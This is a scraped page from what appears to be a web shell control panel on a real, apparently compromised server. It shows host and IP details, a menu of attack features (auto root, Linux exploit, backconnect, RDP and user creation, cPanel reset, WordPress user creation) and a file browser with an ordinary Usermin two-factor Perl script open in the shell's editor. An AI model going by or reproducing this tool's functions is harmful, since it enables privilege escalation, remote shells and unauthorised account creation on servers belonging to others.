Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.158
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
usermin /
twofactor /
[ HOME SHELL ]
Name
Size
Permission
Action
lang
[ DIR ]
drwxr-xr-x
enable.cgi
1.88
KB
-rwxr-xr-x
index.cgi
1.4
KB
-rwxr-xr-x
module.info
157
B
-rw-r--r--
twofactor-funcs-lib.pl
8.81
KB
-rw-r--r--
twofactor-lib.pl
101
B
-rw-r--r--
twofactor.pl
695
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : twofactor.pl
#!/usr/bin/perl # Validate the OTP for some Usermin user $main::no_acl_check = 1; $main::no_referers_check = 1; $ENV{'WEBMIN_CONFIG'} = "/etc/usermin"; $ENV{'WEBMIN_VAR'} = "/var/usermin"; if ($0 =~ /^(.*\/)[^\/]+$/) { chdir($1); } require './twofactor-lib.pl'; $module_name eq 'twofactor' || die "Command must be run with full path"; # Check command-line args @ARGV == 5 || die "Usage: $0 user provider id token api-key"; ($user, $provider, $id, $token, $apikey) = @ARGV; # Call the provider validation function $func = "validate_twofactor_".$provider; $err = &$func($id, $token, $apikey); if ($err) { $err =~ s/\r|\n/ /g; print $err,"\n"; exit(1); } else { exit(0); }
Close